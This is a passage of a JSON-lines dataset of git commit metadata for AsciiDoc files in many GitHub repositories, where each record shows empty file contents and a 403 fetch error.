badge\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c4e4f14ab64137fcdedad0e2b84876bf672854e","subject":"initial Readme","message":"initial Readme\n","repos":"tuxdevelop\/spring-cloud-demo,tuxdevelop\/spring-cloud-demo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tuxdevelop\/spring-cloud-demo.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d73e78f721bcad25976440dac83e6edd6825d36","subject":"Update 2015-10-17-El-Capitan-PostgreSQL.adoc","message":"Update 2015-10-17-El-Capitan-PostgreSQL.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-10-17-El-Capitan-PostgreSQL.adoc","new_file":"_posts\/2015-10-17-El-Capitan-PostgreSQL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"e9845e5b442141ec3fed32b864114dd544b258f6","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aecba8da16d3dace29f789c6bf108615668744b1","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"371686dda5d368a5d1ac6e93cd02bdbb5b88a8d1","subject":"Update 2017-05-01-PlaidCTF-2017-Writeup.adoc","message":"Update 2017-05-01-PlaidCTF-2017-Writeup.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc6d6416169d8726c6f9135084718154d716ff78","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f60f92ffd0c66adc415bb79358dd384cbe7cd711","subject":"y2b create post 4K in your palm!","message":"y2b create post 4K in your palm!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-02-4K-in-your-palm.adoc","new_file":"_posts\/2015-02-02-4K-in-your-palm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"598aff258fdd7b0fcb92896d879baf83068c09f1","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d16ef39c92e7e28ca4d8bff9eb4d9f0ec5e4762f","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e6d55c15a0411c025f0b45ea8852064bfe8539","subject":"Update 2016-06-28-My-teaching-philosophy.adoc","message":"Update 2016-06-28-My-teaching-philosophy.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-My-teaching-philosophy.adoc","new_file":"_posts\/2016-06-28-My-teaching-philosophy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a924460f4cf9ad38bba6804267997941d49d0c45","subject":"Update 2015-11-01-Base-de-Conocimiento.adoc","message":"Update 2015-11-01-Base-de-Conocimiento.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Base-de-Conocimiento.adoc","new_file":"_posts\/2015-11-01-Base-de-Conocimiento.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82918d01ee36de717fdf0872c4d9105ece4fefda","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be234445079e7f0bc4231460451bbda3ebdbc4a6","subject":"Create do-automation-es.adoc","message":"Create do-automation-es.adoc\n\nSpanish translation for do-automation.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-automation-es.adoc","new_file":"src\/do\/do-automation-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"147c869c0be2e515da62c4461cd5d964e9a8952d","subject":"Adding release notes for release of revapi_parent revapi_build_support revapi_build revapi revapi_maven_utils revapi_basic_features revapi_java_spi revapi_ant_task revapi_java revapi_maven_plugin revapi_reporter_file_base revapi_standalone revapi_reporter_json revapi_reporter_text","message":"Adding 
release notes for release of revapi_parent revapi_build_support revapi_build revapi revapi_maven_utils revapi_basic_features revapi_java_spi revapi_ant_task revapi_java revapi_maven_plugin revapi_reporter_file_base revapi_standalone revapi_reporter_json revapi_reporter_text\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200724-reporting-improvements.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200724-reporting-improvements.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"043a3e612c91f6e7f97ee25fcdc31b6389957b75","subject":"Added Spring documentation.","message":"Added Spring documentation.\n","repos":"apache\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya","old_file":"src\/site\/asciidoc\/extensions\/mod_spring.adoc","new_file":"src\/site\/asciidoc\/extensions\/mod_spring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c42dbff193280d57f3b72cc8b7cb5092e946eff","subject":"add notes for references of import statements","message":"add notes for references of import statements\n","repos":"verydapeng\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,mygithubwork\/boot-works","old_file":"web.adoc","new_file":"web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afdb769c5abe824f3f3bda223d7773ae8dc20d09","subject":"Update 2016-04-04-Ha.adoc","message":"Update 2016-04-04-Ha.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Ha.adoc","new_file":"_posts\/2016-04-04-Ha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bf2386bdf0f0a4aa5dc30679728e5e2a7f0af44","subject":"Add PBR article part three","message":"Add PBR article part three","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part3.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"8a76f52a8a112e1c4f3830b4192bca95198d9182","subject":"Update 2019-01-18-Farewell-Red-Hat-friends.adoc","message":"Update 
2019-01-18-Farewell-Red-Hat-friends.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2019-01-18-Farewell-Red-Hat-friends.adoc","new_file":"_posts\/2019-01-18-Farewell-Red-Hat-friends.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5fd3e855a59452524eb5cafd6894da89f0fe901","subject":"Update 2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","message":"Update 2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","new_file":"_posts\/2016-06-25-Giving-J-Unit-something-like-Test-N-G-Before-Suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8246cb717e8914acb67bfd85edbdc04c8e98413d","subject":"Update 2015-02-18-Lets-Chat-on-Ubuntu.adoc","message":"Update 2015-02-18-Lets-Chat-on-Ubuntu.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-18-Lets-Chat-on-Ubuntu.adoc","new_file":"_posts\/2015-02-18-Lets-Chat-on-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea20feb4a432561dcb6173316d77527b93c4e09d","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2bd3cdc83fed2297b43f7756ccdb4db0825456d","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2413d2068f732353184e4fa378f8f20eb56886b","subject":"[Docs] Fix broken external links in HLRC Rollup documentation","message":"[Docs] Fix broken external links in HLRC Rollup documentation\n\nAnother attempt. 
Introduced in #33521\n","repos":"nknize\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch","old_file":"docs\/java-rest\/high-level\/rollup\/put_job.asciidoc","new_file":"docs\/java-rest\/high-level\/rollup\/put_job.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e5de44b568bb20b8f6c7fa1b02dc40019abd4f6","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9039c4ef6edebff999b107e92976f406113d60b4","subject":"Update 2018-04-08-To-automate-analyzing-J-I-R-A.adoc","message":"Update 2018-04-08-To-automate-analyzing-J-I-R-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-08-To-automate-analyzing-J-I-R-A.adoc","new_file":"_posts\/2018-04-08-To-automate-analyzing-J-I-R-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3953e27f9fa744e4dd771affa804ec9e6d57f096","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 
2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d564e8dda00d3f0f431b4ddfbbf78b8777f1472a","subject":"Add docs for Eureka first config bootstrap","message":"Add docs for Eureka first config bootstrap\n","repos":"fkissel\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mbenson\/spring-cloud-config,thomasdarimont\/spring-cloud-config,psbateman\/spring-cloud-config,royclarkson\/spring-cloud-config,appleman\/spring-cloud-config,shakuzen\/spring-cloud-config,psbateman\/spring-cloud-config,rajkumargithub\/spring-cloud-config,thomasdarimont\/spring-cloud-config,mstine\/spring-cloud-config,spring-cloud\/spring-cloud-config,fkissel\/spring-cloud-config,royclarkson\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config,spring-cloud\/spring-cloud-config,marbon87\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,rajkumargithub\/spring-cloud-config,mstine\/spring-cloud-config,thomasdarimont\/spring-cloud-config,spring-cloud\/spring-cloud-config,royclarkson\/spring-cloud-config,fangjing828\/spring-cloud-config,appleman\/spring-cloud-config,psbateman\/spring-cloud-config,shakuzen\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,marbon87\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e9548955e22dd939c81a860b43ddec255b59734a","subject":"Update 2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","message":"Update 2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","new_file":"_posts\/2017-12-01-Structured-logging-with-SL-FJ-and-Logback.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0398798d654be7e6fa1d195d4159037d355e2d4c","subject":"Added convertBodyTo EIP base docs","message":"Added convertBodyTo EIP base 
docs\n","repos":"onders86\/camel,christophd\/camel,onders86\/camel,cunningt\/camel,isavin\/camel,cunningt\/camel,cunningt\/camel,akhettar\/camel,Fabryprog\/camel,apache\/camel,kevinearls\/camel,pax95\/camel,alvinkwekel\/camel,christophd\/camel,curso007\/camel,gautric\/camel,anoordover\/camel,onders86\/camel,jamesnetherton\/camel,tadayosi\/camel,objectiser\/camel,mcollovati\/camel,christophd\/camel,davidkarlsen\/camel,isavin\/camel,ullgren\/camel,adessaigne\/camel,curso007\/camel,jonmcewen\/camel,anoordover\/camel,DariusX\/camel,gnodet\/camel,punkhorn\/camel-upstream,akhettar\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,zregvart\/camel,anoordover\/camel,jamesnetherton\/camel,tdiesler\/camel,ullgren\/camel,adessaigne\/camel,gautric\/camel,rmarting\/camel,snurmine\/camel,curso007\/camel,christophd\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,sverkera\/camel,pax95\/camel,snurmine\/camel,gautric\/camel,kevinearls\/camel,apache\/camel,rmarting\/camel,zregvart\/camel,jamesnetherton\/camel,gautric\/camel,kevinearls\/camel,cunningt\/camel,dmvolod\/camel,anoordover\/camel,tdiesler\/camel,rmarting\/camel,akhettar\/camel,adessaigne\/camel,sverkera\/camel,jonmcewen\/camel,akhettar\/camel,anoordover\/camel,dmvolod\/camel,dmvolod\/camel,jonmcewen\/camel,dmvolod\/camel,objectiser\/camel,dmvolod\/camel,kevinearls\/camel,CodeSmell\/camel,CodeSmell\/camel,snurmine\/camel,pmoerenhout\/camel,tadayosi\/camel,punkhorn\/camel-upstream,sverkera\/camel,objectiser\/camel,mcollovati\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,pax95\/camel,nikhilvibhav\/camel,tadayosi\/camel,cunningt\/camel,curso007\/camel,alvinkwekel\/camel,jamesnetherton\/camel,apache\/camel,Fabryprog\/camel,snurmine\/camel,tdiesler\/camel,jamesnetherton\/camel,onders86\/camel,objectiser\/camel,sverkera\/camel,davidkarlsen\/camel,anoordover\/camel,gautric\/camel,curso007\/camel,ullgren\/camel,sverkera\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,gnodet\/camel,Fabryprog\/camel,pmoerenhout\/camel,nicolaferraro\/camel,pmoerenhout\/camel,DariusX\/camel,rmarting\/camel,jonmcewen\/camel,apache\/camel,isavin\/camel,snurmine\/camel,isavin\/camel,mcollovati\/camel,adessaigne\/camel,zregvart\/camel,alvinkwekel\/camel,gnodet\/camel,CodeSmell\/camel,jonmcewen\/camel,adessaigne\/camel,akhettar\/camel,tdiesler\/camel,pax95\/camel,curso007\/camel,apache\/camel,nicolaferraro\/camel,sverkera\/camel,tadayosi\/camel,isavin\/camel,rmarting\/camel,pmoerenhout\/camel,tadayosi\/camel,davidkarlsen\/camel,gnodet\/camel,nicolaferraro\/camel,jamesnetherton\/camel,dmvolod\/camel,rmarting\/camel,kevinearls\/camel,gautric\/camel,jonmcewen\/camel,tdiesler\/camel,isavin\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,onders86\/camel,onders86\/camel,snurmine\/camel,mcollovati\/camel,Fabryprog\/camel,alvinkwekel\/camel,tdiesler\/camel,christophd\/camel,gnodet\/camel,nikhilvibhav\/camel,akhettar\/camel,DariusX\/camel,nicolaferraro\/camel,ullgren\/camel,kevinearls\/camel,christophd\/camel,davidkarlsen\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/convertBodyTo-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/convertBodyTo-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb5d1bf33b683881f699c7d1415d00f76622afe4","subject":"Add block_stem examples","message":"Add block_stem 
examples\n","repos":"asciidoctor\/asciidoctor-doctest,asciidoctor\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest,rahmanusta\/asciidoctor-doctest","old_file":"data\/examples\/asciidoc\/block_stem.adoc","new_file":"data\/examples\/asciidoc\/block_stem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahmanusta\/asciidoctor-doctest.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d26cbf26c074f91bb4f7024fb7893204b3968ad","subject":"Update 2017-05-02.adoc","message":"Update 2017-05-02.adoc","repos":"shunkou\/blog,shunkou\/blog,shunkou\/blog,shunkou\/blog","old_file":"_posts\/2017-05-02.adoc","new_file":"_posts\/2017-05-02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shunkou\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"349176bf65f5d53326856b30d63399a6288a7810","subject":"Create 2016-04-25-forge-3.1.1.final.asciidoc","message":"Create 2016-04-25-forge-3.1.1.final.asciidoc","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-04-25-forge-3.1.1.final.asciidoc","new_file":"news\/2016-04-25-forge-3.1.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"6025f63f1b65e6ce3723d8007a1889c01daccedb","subject":"y2b create post HP Envy 14 Beats Edition Unboxing \\u0026 Overview + Macro Close Up Shots!","message":"y2b create post HP Envy 14 Beats Edition Unboxing \\u0026 Overview + Macro Close Up Shots!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-08-HP-Envy-14-Beats-Edition-Unboxing-u0026-Overview--Macro-Close-Up-Shots.adoc","new_file":"_posts\/2011-01-08-HP-Envy-14-Beats-Edition-Unboxing-u0026-Overview--Macro-Close-Up-Shots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"109abdeb912f4fa20ec9ade486014fb744f45673","subject":"Update 2016-03-01-Ohne-Composer-und-Kommandozeile-gabe-es-fur-mich-keine-Flat-File-C-M-S.adoc","message":"Update 2016-03-01-Ohne-Composer-und-Kommandozeile-gabe-es-fur-mich-keine-Flat-File-C-M-S.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-03-01-Ohne-Composer-und-Kommandozeile-gabe-es-fur-mich-keine-Flat-File-C-M-S.adoc","new_file":"_posts\/2016-03-01-Ohne-Composer-und-Kommandozeile-gabe-es-fur-mich-keine-Flat-File-C-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d21954f31c07e1f24fd9d809a672bc4a3042642","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
